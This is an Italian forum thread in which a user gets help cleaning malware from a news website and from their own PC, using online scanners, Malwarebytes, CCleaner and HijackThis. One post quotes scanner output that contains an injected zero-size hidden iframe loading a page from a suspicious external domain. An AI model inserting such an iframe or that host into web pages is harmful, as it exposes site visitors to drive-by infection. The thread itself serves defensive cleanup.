Infezione: HTML:Iframe-inf

[tato75]

Ciao a tutti. Spero di non essere off topic o di non ripetere discussioni già aperte... in caso, per favore, indicatemi il topic giusto. Grazie.
Avrei bisogno di una mano per risolvere il problema che vedete nell'oggetto:
Infezione: HTML:Iframe-inf.
Collaboro con un sito di informazione, mi occupo prevalentemente dell'impaginazione e credo di avergli passato un virus (l'ho scoperto solo oggi dopo aver scaricato Avast....). Mi spiego: mi connetti, entro con user e password nella piattaforma e poi gestisco il lavoro sul server. Avast mi ha segnalato un virus nel file AppData che ora dovrebbe aver cancellato, ma mi sa che io l'ho passato, appunto, alle cartelle online.
Qualcuno può darmi infomazioni/dritte/suggerimenti da girare a chi si occupa materialmente delle cartelle del sito che sono sul server, in modo tale da rendergli le cose semplici? Praticamente c'è una intera sezione del sito che io non riesco nemmeno ad aprire perchè Avast me lo blocca a casua dell'infezione che avete letto. Cosa che, comunque, non accadeva con Avira e compagnia: nessuno di questi mi segnalava alcunchè!
Grazie per l'aiuto

[giogio]

Ciao e benvenuto.
Prima di tutto volevo dirti che nessun antivirus ha il 100% dei rilevamenti (un po per discolpare avira etc...) neanche avast.
Comunque, nel box che ti appare durante la navigazione dovresti avere informazioni su dove si trova il virus, dovresti passargli tali informazioni.
Inoltre esistono dei siti come
http://sucuri.net/
http://www.quttera.com/
https://www.virustotal.com/
(quest'ultimo selezionare scansione URL)
che eseguono la scansione del sito e dovrebbero indicarti in che posizione si trova il malaware.
Se in questo modo risolvi bene, altrimenti devi comunicarci l'url malevolo per tentare di capire queal'è il problema (per favore interrompi il collegamento ad esempio cosi hxxp://www.google.com)

[tato75]

Grazie del benvenuto!
Sucuri prima mi dava un malware Iframe che ora invece non c'è più, così come dice che è pulito anche Virustotal. Fatto sta che Avast blocca tutto e tanto per gradire il sito è stato hackerato 20 minuti fa.
hxxp://www.momentosera.it, così ti rendi conto da solo.
E non è la prima volta che accade

[giogio]

Ciao,
analizzando con un tool che ti ho postato e altri questi sono i risultati
http://www.quttera.com/detailed_report/www.momentosera.it
http://www.unmaskparasites.com/security-report/?page=www.momentosera.it/home.php
http://zulu.zscaler.com/submission/show/2f377fd2ca9f2f29a9ab9d07746624ac-1350208564

sembra che ci sia un link potenzialmente malevolo nascosto.
Prova a girare questi dati a chi gestisce il sito per rimuoverlo.

[tato75]

Ti ringrazio moltissimo, girerò tutto a chi è un pò più esperto...
Intanto non so se hai visto, ma anche un fantomatico gruppo di "pulitori" ha hackerato l'intera homepgae segnalando bug. Che gentili.
Grazie e ancora e buona giornata

[giogio]

Di niente.. spero che risolvano il problema.
Ora anche
http://sitecheck.sucuri.net/results/www.momentosera.it
http://labs.sucuri.net/db/malware/malware-entry-mwdefaced01
rileva che c'è stato un hack nella home page.
ciao

[tato75]

Ti disurbo ancora... anche se non so se a questo punto vado troppo oltre... in questo caso ignorami e scusami.
Comunque... ho passato tutte le informazioni e ci stanno lavorando. Anche se Sucuri ha già cambiato la sua valutazione e ora indica altri Iframe.

Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
 <iframe src="http://hvfodytrnel3476gpsbvgl.tld.cc/links/treat_relates_community.php" width="0" height="0">
 
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
 <iframe src="http://hvfodytrnel3476gpsbvgl.tld.cc/links/treat_relates_community.php" width="0" height="0"></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
 
Ma una questione inizia a ronzarmi in testa: quando apro un qualunque link hxxp://www.momentosera.it, vado poi su uno degli articoli a caso, per esempio hxxp://www.momentosera.it/articolo.php?id=14525 (i numeri finali sono quelli che indicano l'articolo). Inizialmente lo apro e Avast non dice nulla. Chiudo, riprovo ad aprirlo e Avast lo blocca indicando quanto sotto:

URL: hxxp://www.momentosera.it/articolo.php?id=14525
Infezione: HTM:Iframe-inf
Processo: C:\Program Files (x86)\Internet Explorer\iexplorer.exe

Ma non è che per caso sono io che continuo a "passare" qualcosa? Non a caso la homepage attualmente è composta da un omino giallo e una scritta che indica una sospensione temporanea. Lo vedo con un altro pc (del mio vicino....) e sul mio smartphone, ma questo pc (con cui scrivo e lavoro) mi mostra solo una pagina bianca... Provo col tasto F5 ma non succede nulla uguale...
Piccola aggiunta: alla prima scansione con Avast, in C:....Temp\Local\AppData ..... ecc ecc c'era quel famoso "http://hvfodytrnel3476gpsbvgl.tld.cc/links/treat_relates_community.php" che Sucuri e altri indicano.

[giogio]

Ciao

Ma una questione inizia a ronzarmi in testa: quando apro un qualunque link hxxp://www.momentosera.it, vado poi su uno degli articoli a caso, per esempio hxxp://www.momentosera.it/articolo.php?id=14525 (i numeri finali sono quelli che indicano l'articolo). Inizialmente lo apro e Avast non dice nulla. Chiudo, riprovo ad aprirlo e Avast lo blocca indicando quanto sotto:

anche io vedo l'omino giallo nella home page e se invece vado qui hxxp://www.momentosera.it/articolo.php?id=14525 avast mi blocca subito la connessione (con FF 16), con IE9 invece non riesco proprio a caricare la pagina..
Non credo che tu stia passando ancora il virus, piuttosto magari prova con un altro browser.
Se non sei sicuro di aver debellato il virus fai con avast una scansione completa all'avvio e poi fanne un'altra completa con MBAM free
http://www.malwarebytes.org/products/malwarebytes_free/

[tato75]

Ciao.
In effetti una scansione all'avvio con Avast l'avevo fatta e non dava nulla.
Ho fatto anche quella con MBAM e ha trovato questo:
trojan. delf    in    C:\ProgramData\lsass.exe

Ho cancellato e ora ne sto rifacendo un'altra per maggiore sicurezza...

[giogio]

Ok, MBAM serve per completare la protezione di avast (come avevo detto all'inizio nessun antivirus...) ed è pienamente compatibile.
Quando hai finito con le scansioni fatti una bella pulizia con ccleaner dei file temporanei
http://www.piriform.com/ccleaner/download
quindi per essere sicuro mandami il log di Hijackthis
http://www.filehippo.com/it/download_hijackthis/
che se vuoi ti controllo è rimasto qualcosa in giro.

ciao

PS
consiglio personale disattiva il ripristino di configurazione del sistema, molti virus si annidano li... ripeto un consiglio.

[tato75]

Con MBAM tutto pulito.
Ho cancellato anche un sacco di roba con ccleaner.
Ti allego il log di Hijackthis (tra l'altro mi dà noie in fase di avvio: dice che c'è un problema con Hosts file, gli dico ok e poi continua da solo).
Grazie

P.S. E come lo disattivo il ripristino di configurazione del sistema?

[giogio]

Bene,
se non sai cosa sia questo cancellalo (selezionandolo in Hijackthis e poi Fix Checked)

Code: [Select]

O4 - HKLM\..\Run: [Setwallpaper] c:\programdata\SetWallpaper.cmd
e anche questi che non sono utili

Code: [Select]

O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

P.S. E come lo disattivo il ripristino di configurazione del sistema?

    Click su bottone Start (il logo di Windows)
    click destro su Computer > Proprietà.
    Ora si aprirà il centro di sicurezza di Windows 7, tra le diverse opzioni cerchiamo Protezione Sistema (si trova sulla sinistra) e facciamo click sopra.
    per accedere al successivo passaggio è necessario avere  i privilegi Admin.
    Ora si aprirà la finestra Proprietà del Sistema come su windows XP
    Selezioniamo l'hdd di sistema (è facile da trovare è quello con la bandierina di Windows)
    facciamo click su Configura poi Disattiva protezione di sistema (io sinceramente ho lasciato "ripristina solo versioni precedenti dei file" funziona come shadow copy http://it.wikipedia.org/wiki/Shadow_Copy).
    Premiamo su OK e Tasto SI per confermare l'alert.


Ho visto che hai installato componenti di Comodo, non hai installato il loro antivirus vero? (può creare conflitto con avast, il solo firewall invece è ok)

[tato75]

Buongiorno.
Credo che il mio Hijackthis non funzioni (forse è il problema che mi segnala in avvio e che ti faccio vedere nella .jpeg). Comunque il primo (Setwallpaper) non lo trova nemmeno più, gli altri tre invece li trova puntualmente, li seleziono, poi Fix Checked: mi dice che ripara/cancella e poi, quando lo lancio nuovamente, eccoli nello stesso punto. Ti allego il nuovo file log.
Per il resto, ho scoperto che il ripristino di configurazione di sistema era già disattivato. Comodo invece sì, ho solo il firewall.

[giogio]

Ok,
si può dare problemi Hijackthis con Win 7...
Prova ad aprire ccleaner, se vai su tools e poi startup, dovresti vedere quelle voci, li le puoi cancellare.
ciao

[tato75]

Buon pomeriggio,
Ok li ho cancellati con CCleaner stavolta